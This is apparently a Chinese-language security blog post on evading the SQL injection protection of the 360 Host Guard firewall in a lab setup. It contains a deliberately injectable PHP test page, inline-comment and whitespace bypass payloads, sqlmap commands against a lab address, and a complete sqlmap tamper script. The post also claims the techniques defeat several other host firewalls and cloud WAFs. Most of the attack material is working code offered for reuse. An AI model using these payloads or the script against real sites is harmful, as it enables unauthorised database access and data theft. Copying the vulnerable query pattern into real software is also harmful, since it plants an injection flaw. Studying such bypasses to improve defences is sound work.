Bypass 360主机卫士SQL注入防御（附tamper脚本）

0x01 前言

　　在测试过程中，经常会遇到一些主机防护软件，对这方面做了一些尝试，可成功bypass了GET和POST的注入防御，分享一下姿势。

0x02 环境搭建

Windows Server 2003+phpStudy

sql注入点测试代码：

sql.php

<?php
$con = mysql_connect("localhost","root","root");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }
mysql_select_db("test", $con);
$id = $_REQUEST[ 'id' ];
$query  = "SELECT * FROM admin WHERE username = $id ";
$result = mysql_query($query);
while($row = mysql_fetch_array($result))
  {
  echo $row['0'] . " " . $row['1'];
  echo "<br />";
  }
echo "<br/>";
echo $query;
mysql_close($con);
?>

运行效果：

0x03 Bypass 过程

　　对不同waf做了一些尝试，关于SQL注入bypass，可以考虑划分为3种：

　　　　1、完全bypass（union select+select from）

　　　　2、部分bypass（union select 或select from）

　　　　3、获取一些敏感信息（如version()、database()等）     

A、Union+select

        先考虑如何绕过union+select，可以考虑一下几种形式

　　　　1、最常见形式 %20、+、/**/

　　　　2、Mysql中可以利用的空白字符有：%09,%0a,%0b,%0c,%0d,%20,%a0

　　　　3、内联注释   /!12345select/

 通过组合测试，可以发现 union%0a/*!12345select*/ 1,2 可以绕过防御。

 B、select+from

　　select+from 也可以通过同样的组合形式绕过防御。

　　至此已完全绕过union+select+from。

0x04 自动化注入

编写tamper bypass脚本，来利用sqlmap来跑数据

先看一下原始sqlmap的效果：

sqlmap.py -u  http://192.168.106.130/config/sql.php?id=1  --flush-session --dbs   失败

加载tamper脚本，可成功获取数据。

sqlmap.py -u http://192.168.106.130/config/sql.php?id=1 --flush-session  --technique=U --tamper="360safe.py" --dbs

tamper脚本：

#!/usr/bin/env python

"""
write by Aaron
"""
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW
def dependencies():
    pass
def tamper(payload, **kwargs):
    """
    Replaces keywords
    >>> tamper('UNION SELECT id FROM users')
    'union%0a/*!12345select*/id%0a/*!12345from*/users'
    """
    if payload:
        payload=payload.replace(" ALL SELECT ","%0a/*!12345select*/")
        payload=payload.replace("UNION SELECT","union%0a/*!12345select*/")
        payload=payload.replace(" FROM ","%0a/*!12345from*/")
        payload=payload.replace("CONCAT","CONCAT%23%0a")
        payload=payload.replace("CASE ","CASE%23%0a")
        payload=payload.replace("CAST(","/*!12345CASt(*/")
        payload=payload.replace("DATABASE()","database%0a()")
                
    return payload

 这边主要是针对union select查询进行的关键字替换，测试过程中，可以发现利用tamper脚本来bypass的弊端，sqlmap的部分payload是固定的，部分关键字会被waf拦截，需要一步步调试，总结，测试哪些关键字是被拦截的，如何绕过关键字的检测等，还是挺麻烦。

0x05 END

　　最好的自动化注入工具：可以考虑自己编写一个自动化注入工具，灵活的自定义payload来获取数据库信息。

　　目前的测试成果，可成功bypass注入防御，如 安全狗、云锁、360主机卫士、D盾_IIS防火墙等主机防护软件及各种云waf，有些姿势都在用。

最后

欢迎关注个人微信公众号：Bypass--，每周原创一篇技术干货。